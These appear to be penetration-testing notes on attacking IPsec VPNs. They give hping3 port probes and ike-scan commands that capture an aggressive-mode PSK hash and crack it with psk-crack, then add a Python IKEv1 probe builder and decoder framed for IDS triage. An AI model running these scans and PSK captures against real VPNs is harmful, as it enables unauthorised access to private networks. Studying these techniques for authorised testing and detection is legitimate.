Attacking VPNs

The VPN Hacker's Toolkit


  • IPsec tools: Used for building IPsec tunnels

  • IKE-scan: An IKE probing utility

  • PSK-crack: A tool for cracking PSKs used by IKE

  • OpenSSL: Client-server tools for SSL/TLS negotiations

  • VPN clients

VPN Hacking Methodology


  1. Identify the VPN technology in use.

  2. Establish initial communications with the server; identify the authentication and encryption methods in use.

  3. Perform a "handshake" with the server and look for information leaks.

  4. Identify vulnerabilities for exploitation using the leaked information.

Crafting hping3 commands


# Send TCP SYN packets to port 53
hping3 -S -p 53 <TargetIP>

# Send UDP packets to port 500 (used by IKE)
hping3 --udp -p 500 <TargetIP>

# Bash loop that reads udp.txt and sends one UDP probe (-2 = UDP mode, -c 1 = one packet) to each port listed
for port in $(cat udp.txt); do echo "TESTING UDP PORT: $port"; hping3 -2 -p "$port" -c 1 <TargetIP>; done

IKE-scan


  • ike-scan attempts to communicate with the target using the IKE protocol and reports how the responder answers

# ike-scan
# Uses the defaults: 3DES encryption, SHA1 hash, PSK authentication, DH Group 2
ike-scan <TargetIP>

# Same as the defaults, written out as enc,hash,auth,group
ike-scan --trans=5,2,1,2 <TargetIP>

# This command will use the following:
# DES-CBC encryption, MD5 hash, PSK auth, DH Group 1
ike-scan --trans=1,1,1,1 <TargetIP>

# Newer method for specifying transforms (attribute=value pairs: 1=encryption, 2=hash, 3=auth, 4=DH group)
ike-scan --trans="(1=5,2=2,3=1,4=2)" <TargetIP>

# Runs the scan in aggressive mode
ike-scan -A <TargetIP>

# If aggressive mode returns an Auth=PSK response, the target might be vulnerable.
# Attempt to capture the PSK hash
ike-scan -A <TargetIP> --pskcrack=pskhash

# If the previous command works you will have a file named pskhash
# Attempt to crack the hash
psk-crack pskhash

IKEmulti


  • ikemulti.py tries multiple transform combinations against the target

# Running ikemulti.py 
python ikemulti.py -i <TargetIP>

Aggressive Mode


  • Main mode can be thought of as the normal way of exchanging information during IKE Phase 1

  • Aggressive mode is designed to speed up the process by performing a shorter handshake

    • Aggressive mode can leak information

    • If this mode is used with a PSK, the hash of the key can be captured from the responder and cracked offline, without the attacker ever having authenticated
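
The two sections above (the ike-scan transform syntax and the Aggressive Mode risk) share the same wire format. The following added example, which is neither from these notes nor from ike-scan itself, builds a constructed IKEv1 Phase 1 probe from the same enc,hash,auth,group values the page passes to --trans and decodes it the way an IDS or pcap-triage script would, flagging an Aggressive Mode exchange that offers PSK authentication. Field layout follows RFC 2408 (ISAKMP) and attribute values RFC 2409 Appendix A; the sample bytes are constructed, not captured.

```python
# Added example: build and decode an IKEv1 Phase 1 SA probe (RFC 2408 / RFC 2409); not ike-scan code.
import struct

ATTR_NAMES = {1: "enc", 2: "hash", 3: "auth", 4: "group"}        # IKEv1 attribute classes
VALUE_NAMES = {"enc": {1: "DES-CBC", 5: "3DES-CBC", 7: "AES-CBC"}, "hash": {1: "MD5", 2: "SHA1"},
               "auth": {1: "PSK", 3: "RSA-Sig"},
               "group": {1: "MODP-768", 2: "MODP-1024", 5: "MODP-1536", 14: "MODP-2048"}}
EXCHANGE = {2: "Main Mode", 4: "Aggressive Mode"}                 # ISAKMP exchange types

def build_probe(enc, hash_, auth, group, aggressive=False):
    """Constructed sample: ISAKMP header + SA/Proposal/Transform with four basic (TV) attributes."""
    attrs = b"".join(struct.pack("!HH", 0x8000 | t, v)           # AF bit set: 2-byte value
                     for t, v in ((1, enc), (2, hash_), (3, auth), (4, group)))
    transform = struct.pack("!BBHBBH", 0, 0, 8 + len(attrs), 1, 1, 0) + attrs   # KEY_IKE
    proposal = struct.pack("!BBHBBBB", 0, 0, 8 + len(transform), 1, 1, 0, 1) + transform
    sa = struct.pack("!BBHII", 0, 0, 12 + len(proposal), 1, 1) + proposal       # IPsec DOI / SIT_IDENTITY_ONLY
    hdr = struct.pack("!8s8sBBBBII", b"\x11" * 8, b"\0" * 8, 1, 0x10,
                      4 if aggressive else 2, 0, 0, 28 + len(sa))
    return hdr + sa

def decode_probe(data):
    # Returns {"exchange": str, "transforms": [{"enc":..,"hash":..,"auth":..,"group":..}, ...]}
    if len(data) < 40 or data[16] != 1:                 # need the header and an SA as first payload
        raise ValueError("not an IKEv1 message that starts with an SA payload")
    out = {"exchange": EXCHANGE.get(data[18], f"type {data[18]}"), "transforms": []}
    off, sa_end = 40, 28 + struct.unpack("!H", data[30:32])[0]  # skip SA header, DOI, Situation
    while off < sa_end:                                         # each proposal payload
        prop_len, spi_size = struct.unpack("!H", data[off + 2:off + 4])[0], data[off + 6]
        t_off, prop_end = off + 8 + spi_size, off + prop_len
        while t_off < prop_end:                                 # each transform payload
            t_end = t_off + struct.unpack("!H", data[t_off + 2:t_off + 4])[0]
            a_off, attrs = t_off + 8, {}
            while a_off < t_end:                                # each attribute, TV or TLV form
                typ, tv = struct.unpack("!HH", data[a_off:a_off + 4])
                if typ & 0x8000:                                # TV: tv is the value itself
                    val, a_off = tv, a_off + 4
                else:                                           # TLV: tv is the value length
                    val = int.from_bytes(data[a_off + 4:a_off + 4 + tv], "big")
                    a_off += 4 + tv
                name = ATTR_NAMES.get(typ & 0x7FFF)
                if name:
                    attrs[name] = VALUE_NAMES[name].get(val, str(val))
            out["transforms"].append(attrs)
            t_off = t_end
        off = prop_end
    return out

def is_psk_aggressive(decoded):
    """The condition the notes describe: Aggressive Mode proposed together with PSK authentication."""
    return decoded["exchange"] == "Aggressive Mode" and any(t.get("auth") == "PSK" for t in decoded["transforms"])
```

Pointing decode_probe at the UDP/500 payload of a captured first message (for example via a pcap reader) gives the same classification for real traffic.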
